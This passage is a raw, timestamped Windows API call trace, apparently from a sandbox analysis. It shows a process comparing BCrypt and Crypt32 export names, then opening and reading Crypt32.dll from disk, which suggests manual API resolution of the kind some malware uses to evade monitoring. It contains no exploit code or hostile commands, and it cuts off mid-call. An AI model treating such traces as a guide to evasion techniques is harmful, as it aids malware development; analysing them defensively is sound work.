lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0225.366] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0225.366] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0225.367] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0225.367] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0225.367] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.367] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0225.368] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0225.369] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0225.369] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0225.370] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0225.371] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0225.372] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0225.373] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0225.374] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0225.374] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0225.374] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0225.374] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0225.374] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0225.375] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0225.376] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0225.377] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0225.379] GetProcessHeap () returned 0x570000 [0225.379] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x570000) returned 1 [0225.379] GetProcessHeap () returned 0x570000 [0225.379] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589140 [0225.380] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0226.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0226.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0226.024] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0226.025] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0226.026] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0226.026] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0226.026] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0226.026] GetProcessHeap () returned 0x570000 [0226.026] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c30e0) returned 0x410f040 [0226.031] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0226.031] ReadFile (in: hFile=0x160, lpBuffer=0x410f040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410f040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0226.419] CloseHandle (hObject=0x160) returned 1 [0226.419] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0226.419] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.419] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0226.419] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.419] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.419] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0226.419] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0226.420] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0226.420] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0226.420] lstrcmpA (lpString1="CertAddCertificateLinkToStore", 